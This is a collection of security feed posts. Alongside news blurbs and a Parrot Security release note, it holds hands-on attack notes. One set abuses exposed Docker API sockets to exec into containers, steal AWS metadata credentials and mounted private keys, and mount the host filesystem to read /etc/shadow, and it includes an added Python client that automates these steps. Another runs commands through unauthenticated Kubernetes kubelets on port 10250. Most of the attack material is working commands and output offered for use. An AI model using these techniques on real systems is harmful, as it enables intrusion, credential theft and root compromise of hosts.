Application News – Application Security Weekly #49

    Three UK customer details exposed in homepage blunder, Microsoft cloud services see global authentication outage, the age of surveillance capitalism, the rise of DevXOps, and much more! News Bugs, Breaches, and More! 1.) Three UK customer details exposed in homepage blunder 2.) Microsoft cloud services see global authentication outage 3.) Microsoft Exchange vulnerable to ‘PrivExchange’ zero-day […]
The post Application News – Application Security Weekly #49 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/K6Jx2mXiVsg/

Abusing Docker API | Socket

Notes on abusing open Docker sockets. This won't cover breaking out of Docker containers.

Ports: usually 2375 (plain HTTP) and 2376 (TLS), but it can be anything.

Refs:
https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0
https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way
https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html
https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html
https://infoslack.com/devops/exploring-docker-remote-api
https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf
https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/
https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/
https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124
https://www.exploit-db.com/exploits/42356
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb
http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html
https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/
https://blog.ropnop.com/plundering-docker-images/

Enable the Docker socket (to create practice locations):
https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd

Having the Docker API/socket exposed is essentially granting root: anyone who can reach it controls every container on the system and, as shown at the end of these notes, can mount the host filesystem into a privileged container and read it as root.

The daemon listens on unix:///var/run/docker.sock by default, but you can bind Docker to another host/port or a different Unix socket. The Docker socket is what the daemon listens on, and it can be used to talk to the daemon from within a container (if the socket is mounted into it) or, if configured, from outside against the host running Docker. All the Docker socket magic happens via the Docker API.

For example, if we wanted to spin up an nginx container we'd do the below.

Create an nginx container. The following command uses curl to send the {"Image":"nginx"} payload to the /containers/create endpoint of the Docker daemon through the Unix socket. This will create a container based on nginx and return its ID.

$ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create
{"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null}

Start the container:

$ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start

As mentioned above, you can also have the Docker socket listen on a TCP port. You can validate that it is Docker by hitting it with a version request:

$ curl -s http://open.docker.socket:2375/version | jq
{
  "Version": "1.13.1",
  "ApiVersion": "1.26",
  "MinAPIVersion": "1.12",
  "GitCommit": "07f3374/1.13.1",
  "GoVersion": "go1.9.4",
  "Os": "linux",
  "Arch": "amd64",
  "KernelVersion": "3.10.0-514.26.2.el7.x86_64",
  "BuildTime": "2018-12-07T16:13:51.683697055+00:00",
  "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"
}

or with the Docker client:

$ docker -H open.docker.socket:2375 version
Server:
 Engine:
  Version:          1.13.1
  API version:      1.26 (minimum version 1.12)
  Go version:       go1.9.4
  Git commit:       07f3374/1.13.1
  Built:            Fri Dec  7 16:13:51 2018
  OS/Arch:          linux/amd64
  Experimental:     false

This is basically a shell into every container on the host. Get a list of running containers with the ps command:

$ docker -H open.docker.socket:2375 ps
CONTAINER ID   IMAGE                                               COMMAND                  CREATED      STATUS      PORTS                                           NAMES
72cd30d28e5c   gogs/gogs                                           "/app/gogs/docker/st…"   5 days ago   Up 5 days   0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp   gogs
b522a9034b30   jdk1.8                                              "/bin/bash"              5 days ago   Up 5 days                                                   myjdk8
0f5947860c17   centos/mysql-57-centos7                             "container-entrypoin…"   8 days ago   Up 8 days   0.0.0.0:3306->3306/tcp                          mysql
3965c004c7a7   192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT   "java -jar /app.jar"     8 days ago   Up 8 days   0.0.0.0:12000->12000/tcp                        config
3f466b754971   42cb59080921                                        "/bin/bash"              8 days ago   Up 8 days                                                   jdk8
6499013fdc2d   registry                                            "/entrypoint.sh /etc…"   8 days ago   Up 8 days   0.0.0.0:5000->5000/tcp                          registry

Exec into one of the containers:

$ docker -H open.docker.socket:2375 exec -it mysql /bin/bash
bash-4.2$ whoami
mysql

Other commands. Are there some stopped containers?

$ docker -H open.docker.socket:2375 ps -a

What images are pulled on the host machine?

$ docker -H open.docker.socket:2375 images

I've frequently not been able to get the Docker client to work well when it comes to the exec command, but you can still exec code in the container with the API. The example below uses curl to interact with the API over HTTPS (if enabled): create an exec job, keep the exec ID it returns, and then start the exec so you can get the output.

Using curl to hit the API

Sometimes you'll see 2376 up for the TLS endpoint. I haven't been able to connect to it with the Docker client, but you can hit the Docker API with curl no problem. Note that --insecure only skips verifying the server's certificate; an endpoint that answers without a client certificate is running TLS without tlsverify, which is what makes it open.

Docker socket to metadata URL
https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec

Below is an example of hitting the internal AWS metadata URL and getting the output.

List containers:

$ curl --insecure https://tls-opendocker.socket:2376/containers/json | jq
[
  {
    "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",
    "Names": [
      "/docker_snip_1"
    ],
    "Image": "dotnetify",
    "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",
    "Command": "cmd /S /C 'dotnet netify-temp.dll'",
    "Created": 1541018555,
    "Ports": [
      {
        "IP": "0.0.0.0",
        "PrivatePort": 443,
        "PublicPort": 50278,
--SNIP--

List processes in a container:

$ curl --insecure https://tls-opendocker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
{
  "Processes": [
    [
      "smss.exe",
      "7868",
      "00:00:00.062",
      "225.3kB"
    ],
    [
      "csrss.exe",
      "10980",
      "00:00:00.859",
      "421.9kB"
    ],
    [
      "wininit.exe",
      "10536",
      "00:00:00.078",
      "606.2kB"
    ],
    [
      "services.exe",
      "10768",
      "00:00:00.687",
      "1.208MB"
    ],
    [
      "lsass.exe",
      "10416",
      "00:00:36.000",
      "4.325MB"
    ],
--SNIP--

Set up an exec job to hit the metadata URL:

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'
{"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"}

Get the output:

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
{
  "Code" : "Success",
  "LastUpdated" : "2019-01-29T20:12:58Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIATRSNIP",
  "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",
  "Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP",
  "Expiration" : "2019-01-30T02:43:34Z"
}

Docker secrets

Relevant reading: https://docs.docker.com/engine/swarm/secrets/

List secrets (no secrets / swarm not set up):

$ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
{
  "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."
}

List secrets (they exist):

$ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
[
  {
    "ID": "9h3useaicj3tr465ejg2koud5",
    "Version": {
      "Index": 21
    },
    "CreatedAt": "2018-07-06T10:19:50.677702428Z",
    "UpdatedAt": "2018-07-06T10:19:50.677702428Z",
    "Spec": {
      "Name": "registry-key.key",
      "Labels": {}
    }
  },

Check what is mounted:

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'
{"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"}

Get the output by starting the exec:

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'
overlay on / type overlay
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
--SNIP--
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)
tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)
tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)
tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)
--SNIP--

Cat the mounted secret:

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'
{"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"}

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}'
-----BEGIN RSA PRIVATE KEY-----
MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0
--SNIP--

If you have secrets, it's also worth checking out services in case they are adding secrets via environment variables:

$ curl -s --insecure https://tls-opendocker.socket:2376/services | jq
[
  {
    "ID": "amxjs243dzmlc8vgukxdsx57y",
    "Version": {
      "Index": 6417
    },
    "CreatedAt": "2018-04-16T19:51:20.489851317Z",
    "UpdatedAt": "2018-12-07T13:44:36.6869673Z",
    "Spec": {
      "Name": "app_REMOVED",
      "Labels": {},
      "TaskTemplate": {
        "ContainerSpec": {
          "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",
          "Env": [
            "PGADMIN_DEFAULT_EMAIL=REMOVED",
            "PGADMIN_DEFAULT_PASSWORD=REMOVED"
          ],
          "Isolation": "default"
--SNIP--

Creating a container that has the host filesystem mounted (Binds and Privileged at the top level is the old form; the documented place for them is under "HostConfig"):

$ curl --insecure -X POST -H "Content-Type: application/json" "https://tls-opendocker.socket:2376/containers/create?name=test" -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
{"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null}

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start

Read something from the host:

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
{"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"}

$ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'
root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::
daemon:*:17001:0:99999:7:::
bin:*:17001:0:99999:7:::
sys:*:17001:0:99999:7:::
sync:*:17001:0:99999:7:::
games:*:17001:0:99999:7:::

Cleanup

Stop the container:

$ curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop

Delete stopped containers:

$ curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
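The exec-create / exec-start round trip above is the same whether you reach the daemon over the Unix socket, plain 2375 or TLS 2376, and the part curl hides is that a non-TTY exec start returns a multiplexed stream (8-byte frame headers in front of each stdout/stderr chunk), which is why the raw curl output can contain stray bytes. The following is an added example, not code from the original post: a small Docker Engine API client with a pluggable transport, the /version fingerprint, exec with stream demuxing and exit code, and the privileged host-mount spec with Binds/Privileged under HostConfig (the documented location; the post's top-level form works only through the daemon's deprecated compatibility handling). The hostnames open.docker.socket and tls-opendocker.socket are placeholders as in the post, and the canned responses are constructed so the code runs without a daemon.

```python
"""Docker Engine API helper: pluggable transport, /version check, exec with
stream demux, privileged host-mount container. Added example, not the post's code."""
import http.client
import json
import socket
import ssl
import struct
from typing import Callable, Dict, List, Optional, Tuple

# A transport sends one request (method, path, body) and returns (status, body).
Transport = Callable[[str, str, Optional[bytes]], Tuple[int, bytes]]


class _UnixHTTPConnection(http.client.HTTPConnection):
    """HTTP over the daemon's default Unix socket (what curl --unix-socket does)."""

    def __init__(self, path: str):
        super().__init__("localhost")
        self._path = path

    def connect(self) -> None:
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self._path)


def http_transport(make_conn: Callable[[], http.client.HTTPConnection]) -> Transport:
    def send(method: str, path: str, body: Optional[bytes]) -> Tuple[int, bytes]:
        conn = make_conn()
        headers = {"Content-Type": "application/json"} if body is not None else {}
        conn.request(method, path, body=body, headers=headers)
        resp = conn.getresponse()
        data = resp.read()
        conn.close()
        return resp.status, data
    return send


def unix_transport(path: str = "/var/run/docker.sock") -> Transport:
    return http_transport(lambda: _UnixHTTPConnection(path))


def tcp_transport(host: str, port: int = 2375, tls: bool = False) -> Transport:
    """Plain 2375, or 2376 with server certificate checks off (curl --insecure)."""
    if tls:
        ctx = ssl._create_unverified_context()
        return http_transport(lambda: http.client.HTTPSConnection(host, port, context=ctx, timeout=10))
    return http_transport(lambda: http.client.HTTPConnection(host, port, timeout=10))


def canned_transport(responses: Dict[Tuple[str, str], Tuple[int, bytes]]) -> Transport:
    """Constructed offline stand-in for a daemon, keyed by (method, path)."""
    return lambda method, path, body: responses[(method, path)]


def demux_stream(raw: bytes) -> Dict[str, bytes]:
    """Split the stream /exec/{id}/start returns when Tty is false: each frame is
    a header (stream type 0/1/2, three zero bytes, 4-byte big-endian length) plus
    payload. Anything that is not a valid frame is treated as unframed stdout."""
    out = {"stdout": b"", "stderr": b""}
    i = 0
    while i + 8 <= len(raw):
        kind, pad = raw[i], raw[i + 1:i + 4]
        (length,) = struct.unpack(">I", raw[i + 4:i + 8])
        if kind not in (0, 1, 2) or pad != b"\x00\x00\x00" or i + 8 + length > len(raw):
            break
        out["stderr" if kind == 2 else "stdout"] += raw[i + 8:i + 8 + length]
        i += 8 + length
    if i < len(raw):
        out["stdout"] += raw[i:]
    return out


class DockerAPI:
    def __init__(self, send: Transport):
        self._send = send

    def call(self, method: str, path: str, payload=None) -> bytes:
        body = json.dumps(payload).encode() if payload is not None else None
        status, data = self._send(method, path, body)
        if status >= 400:
            raise RuntimeError(f"{method} {path} -> HTTP {status}: {data[:200]!r}")
        return data

    def call_json(self, method: str, path: str, payload=None):
        data = self.call(method, path, payload)
        return json.loads(data) if data else {}

    def is_docker(self) -> bool:
        """The /version fingerprint from the post: a daemon answers with ApiVersion."""
        try:
            return "ApiVersion" in self.call_json("GET", "/version")
        except (RuntimeError, ValueError, OSError):
            return False

    def exec_run(self, container: str, cmd: List[str]) -> Tuple[Optional[int], bytes, bytes]:
        """Exec create, exec start (non-TTY, demuxed), then inspect for the exit code."""
        spec = {"AttachStdin": False, "AttachStdout": True, "AttachStderr": True, "Cmd": cmd}
        exec_id = self.call_json("POST", f"/containers/{container}/exec", spec)["Id"]
        streams = demux_stream(self.call("POST", f"/exec/{exec_id}/start", {"Detach": False, "Tty": False}))
        code = self.call_json("GET", f"/exec/{exec_id}/json").get("ExitCode")
        return code, streams["stdout"], streams["stderr"]

    def create_and_start(self, spec: dict, name: Optional[str] = None) -> str:
        cid = self.call_json("POST", "/containers/create" + (f"?name={name}" if name else ""), spec)["Id"]
        self.call("POST", f"/containers/{cid}/start")
        return cid


def host_mount_spec(image: str = "alpine") -> dict:
    """Privileged container with the host root bound at /mnt, kept alive by tail."""
    return {"Image": image, "Cmd": ["tail", "-f", "/dev/null"],
            "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True}}


# Constructed responses standing in for an exposed daemon (offline demo/test only).
FAKE = canned_transport({
    ("GET", "/version"): (200, b'{"Version":"1.13.1","ApiVersion":"1.26"}'),
    ("POST", "/containers/mysql/exec"): (201, b'{"Id":"ex1"}'),
    ("POST", "/exec/ex1/start"): (200, b"\x01\x00\x00\x00\x00\x00\x00\x06mysql\n"
                                       b"\x02\x00\x00\x00\x00\x00\x00\x04oops"),
    ("GET", "/exec/ex1/json"): (200, b'{"ExitCode":0}'),
    ("POST", "/containers/create?name=test"): (201, b'{"Id":"c0ffee"}'),
    ("POST", "/containers/c0ffee/start"): (204, b""),
})

if __name__ == "__main__":
    api = DockerAPI(FAKE)  # live: DockerAPI(tcp_transport("open.docker.socket")) or DockerAPI(unix_transport())
    print(api.is_docker(), api.exec_run("mysql", ["whoami"]), api.create_and_start(host_mount_spec(), "test"))
```

Swap FAKE for unix_transport(), tcp_transport("open.docker.socket") or tcp_transport("tls-opendocker.socket", 2376, tls=True) to run the same calls against a real daemon; exec_run then gives you clean stdout/stderr and the exit code instead of the raw framed bytes curl prints.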

Link: http://carnal0wnage.attackresearch.com/2019/02/abusing-docker-api-socket.html

Parrot Security 4.5 – Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot 4.5 is officially released, and there are some major changes under the hood, powered by the long-term supported Linux 4.19 kernel series, preparing the project for the upcoming Parrot 5.0 LTS release. For future releases, Parrot Security plans to support two kernels, a stable kernel and a testing kernel.

Parrot 4.5 also comes with the latest Metasploit 5.0 penetration testing framework, which introduces major features like new evasion modules, a new search engine, a JSON-RPC daemon, integrated web services, and support for writing shellcode in C.

This release improves the metapackages for developers, making it a lot easier to set up an advanced development environment for multiple frameworks and programming languages. These include parrot-devel, parrot-devel-tools, and parrot-devel-extra.

Parrot 4.5 drops support for 32-bit computers

On the other side, Parrot 4.5 is the first release of the ethical hacking operating system to no longer ship with installation or live images for older, 32-bit-only computers. With this, Parrot joins the growing trend of GNU/Linux distributions dropping 32-bit images. However, the developers noted that they will continue to support the 32-bit architecture with updates through the official software repositories for existing users.

Better Dev Tools

There are updates in the metapackages for developers, and setting up an advanced development environment for several programming languages and frameworks is now easier than ever.

parrot-devel

It is pre-installed in Parrot 4.5 and provides the following tools:

vscodium - an advanced and extensible text editor.
zeal - an offline documentation downloader and browser.
git-cola - a graphical client for Git.
meld - a graphical patch inspector.
tora - a graphical database frontend compatible with several database backends.

These packages are included in the metapackage by using the "Recommends" apt directive, and they can be removed individually without triggering the removal of the whole parrot-devel metapackage. The metapackage also recommends the installation of parrot-devel-tools.

sudo apt update
sudo apt install parrot-devel

parrot-devel-tools

It is recommended by parrot-devel and pre-installed in Parrot Security. It provides some useful compilers and interpreters for the most used languages and provides the following packages:

GCC/G++ - a compiler collection for C, C++ and other languages.
python3 - the CPython interpreter for the Python 3.6 and 3.7 language.
ruby - the official Ruby interpreter and basic toolkit (includes irb and ri as well).

The package also recommends the following packages, which can be safely removed without triggering the removal of the entire parrot-devel-tools metapackage:

default-jdk - the latest OpenJDK distribution for Java 11 (both JDK and JRE).
cython3 - a compiler for the Cython language, a strongly-typed dialect of Python for efficient code.
rust/cargo - the Rust compiler and devel tools and its package management system.
valac - the Vala C compiler.
mono-devel - the development tools for the Mono framework, an open source implementation of .NET.
mono-runtime - the runtime of the Mono framework, compatible and interoperable with the latest .NET runtime.
php-cli - the PHP 7.3 language plus its command line interface and some useful core libraries.
perl6 - the Perl 6 interpreter and core libraries.

sudo apt update
sudo apt install parrot-devel-tools

parrot-devel-extra

The parrot-devel-extra metapackage is a quick way to install many additional development utilities like advanced IDEs, additional languages, debuggers and extra tools:

golang - Go language compiler and runtime.
nodejs - Node.js framework.
npm - Node.js package manager.
atom - advanced and extensible editor by GitHub.
qtcreator - powerful C, C++ and Qt/QML IDE and debugger.
kdevelop - advanced general purpose IDE by KDE.
edb-debugger - graphical debugger.
jad - Java decompiler.
nasm - powerful general purpose x86 assembler.
radare2 - advanced command line hexadecimal editor.
cmake - cross-platform, open-source make system.
valgrind - instrumentation framework for building dynamic analysis tools.
devscripts/build-essential - useful development utilities for Debian developers/maintainers.

sudo apt update
sudo apt install parrot-devel-extra

Download Parrot Security 4.5

Link: http://feedproxy.google.com/~r/PentestTools/~3/xXnhQTKJewU/parrot-security-45-security-gnulinux.html

LinkedIn, MySQL, & Cyber Attacks – Hack Naked News #204

    A flaw in MySQL could allow rogue servers to steal files, a state agency exposes 3TB of data including FBI info, how cybercriminals clean their dirty money, a critical RCE flaw in Linux APT allows remote attackers to hack systems, and how to protect against a new breed of cyber attack! Jason Wood […]
The post LinkedIn, MySQL, & Cyber Attacks – Hack Naked News #204 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/wxbXbYGhYOA/

Kubernetes: unauth kublet API 10250 basic code exec

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it's still possible to expose it inadvertently, and it's still pretty common to find it exposed via the "insecure API service" option (a kubelet running with anonymous auth enabled and AlwaysAllow authorization answers anyone). Anyone who can reach the kubelet port (10250), even without a certificate, can execute any command inside any container on that node.

# /run/%namespace%/%pod_name%/%container_name%

Example:

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"
total 12
drwxr-xr-x   13 root     root           148 Aug 26 11:31 .
drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..
-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenv
drwxr-xr-x    2 root     root          8192 May  5 22:22 bin
drwxr-xr-x    5 root     root           380 Aug 26 11:31 dev
drwxr-xr-x    3 root     root           135 Aug 26 11:31 etc
drwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 home
drwxr-xr-x    2 root     root             6 Apr 23 11:17 lib
dr-xr-xr-x  353 root     root             0 Aug 26 07:14 proc
drwxr-xr-x    2 root     root             6 Mar 18 16:38 root
dr-xr-xr-x   13 root     root             0 Aug 26 15:12 sys
drwxrwxrwt    2 root     root             6 Mar 18 16:38 tmp
drwxr-xr-x    4 root     root            31 Apr 23 11:17 usr
drwxr-xr-x    5 root     root            41 Aug 26 11:31 var

Here is how to get all the secrets a container uses (environment variables; it's common to see kubelet tokens here):

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/

The list of all pods and containers scheduled on the Kubernetes worker node can be retrieved with the command below:

$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

or

$ curl --insecure https://k8s-node-1:10250/runningpods | jq

The three responses you will see are: the authorizer rejecting the anonymous user (authentication is open but authorization is not), the request being rejected outright (anonymous auth disabled), or the pod list (the kubelet is open).

Example 1:

curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:

Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)

Example 2:

curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:

Unauthorized

Example 3:

curl --insecure https://1.2.3.4:10250/runningpods | jq

Output:

{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "kube-dns-5b8bf6c4f4-k5n2g",
        "generateName": "kube-dns-5b8bf6c4f4-",
        "namespace": "kube-system",
        "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",
        "uid": "63438841-e43c-11e8-a104-42010a80038e",
        "resourceVersion": "85366060",
        "creationTimestamp": "2018-11-09T16:27:44Z",
        "labels": {
          "k8s-app": "kube-dns",
          "pod-template-hash": "1646927090"
        },
        "annotations": {
          "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",
          "kubernetes.io/config.source": "api",
          "scheduler.alpha.kubernetes.io/critical-pod": ""
        },
        "ownerReferences": [
          {
            "apiVersion": "extensions/v1beta1",
            "kind": "ReplicaSet",
            "name": "kube-dns-5b8bf6c4f4",
            "uid": "633db9d4-e43c-11e8-a104-42010a80038e",
            "controller": true
          }
        ]
      },
      "spec": {
        "volumes": [
          {
            "name": "kube-dns-config",
            "configMap": {
              "name": "kube-dns",
              "defaultMode": 420
            }
          },
          {
            "name": "kube-dns-token-xznw5",
            "secret": {
              "secretName": "kube-dns-token-xznw5",
              "defaultMode": 420
            }
          }
        ],
        "containers": [
          {
            "name": "dnsmasq",
            "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",
            "args": [
              "-v=2",
              "-logtostderr",
              "-configDir=/etc/k8s/dns/dnsmasq-nanny",
              "-restartDnsmasq=true",
              "--",
              "-k",
              "--cache-size=1000",
              "--no-negcache",
              "--log-facility=-",
              "--server=/cluster.local/127.0.0.1#10053",
              "--server=/in-addr.arpa/127.0.0.1#10053",
              "--server=/ip6.arpa/127.0.0.1#10053"
            ],
            "ports": [
              {
                "name": "dns",
                "containerPort": 53,
                "protocol": "UDP"
              },
              {
                "name": "dns-tcp",
                "containerPort": 53,
                "protocol": "TCP"
              }
            ],
            "resources": {
              "requests": {
                "cpu": "150m",
                "memory": "20Mi"
              }
            },
            "volumeMounts": [
              {
                "name": "kube-dns-config",
                "mountPath": "/etc/k8s/dns/dnsmasq-nanny"
              },
              {
                "name": "kube-dns-token-xznw5",
                "readOnly": true,
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"
              }
            ],
            "livenessProbe": {
              "httpGet": {
                "path": "/healthcheck/dnsmasq",
                "port": 10054,
                "scheme": "HTTP"
              },
              "initialDelaySeconds": 60,
              "timeoutSeconds": 5,
              "periodSeconds": 10,
              "successThreshold": 1,
              "failureThreshold": 5
            },
            "terminationMessagePath": "/dev/termination-log",
            "imagePullPolicy": "IfNotPresent"
          },
--SNIP--

With the output of the running pods command (namespace, pod name, container name) you can craft your command to do the code exec:

$ curl -k -XPOST "https://k8s-node-1:10250/run/

As an example, that leaves you with:

curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  125 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Nov  9 16:27 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var
